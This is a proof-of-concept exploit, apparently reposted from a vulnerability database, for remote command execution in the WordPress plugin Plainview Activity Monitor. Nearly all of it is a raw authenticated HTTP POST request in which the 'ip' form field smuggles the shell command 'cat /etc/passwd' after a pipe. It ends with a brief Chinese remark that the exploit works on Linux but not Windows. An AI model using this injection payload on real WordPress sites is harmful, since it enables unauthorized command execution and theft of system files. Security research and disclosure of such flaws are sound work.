Plainview Activity Monitor <= 20161228 - Remote Command Execution (RCE)


POST /wp/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools HTTP/1.1
Host: localhost:8000
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost:8000/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools
Content-Type: multipart/form-data; boundary=---------------------------13707449992054116824594351796
Content-Length: 309
Cookie: wordpress_172ea7b136db2f4d7f274f6aec44d752=root%7C1535597327%7CnYzAtEgU4aZTjU73b6CvjfLxZO5O6jDFDjdlj4CkLbI%7C7c64eb963143a28066d30ca39f803476a074467c0e6ed91040dbb3e1e634e1aa; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_172ea7b136db2f4d7f274f6aec44d752=root%7C1535597327%7CnYzAtEgU4aZTjU73b6CvjfLxZO5O6jDFDjdlj4CkLbI%7C0ce46f9c1f39f83d6868868ad9b77adbff349d98fec2c1bfd9ca1aa51e55e9f4; wp-settings-time-1=1535424871
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------13707449992054116824594351796
Content-Disposition: form-data; name="ip"

google.fr|cat /etc/passwd
-----------------------------13707449992054116824594351796
Content-Disposition: form-data; name="lookup"

Lookup
-----------------------------13707449992054116824594351796--

windows环境无法复现,linux下复查完成。

from:https://wpvulndb.com/vulnerabilities/9114

参与评论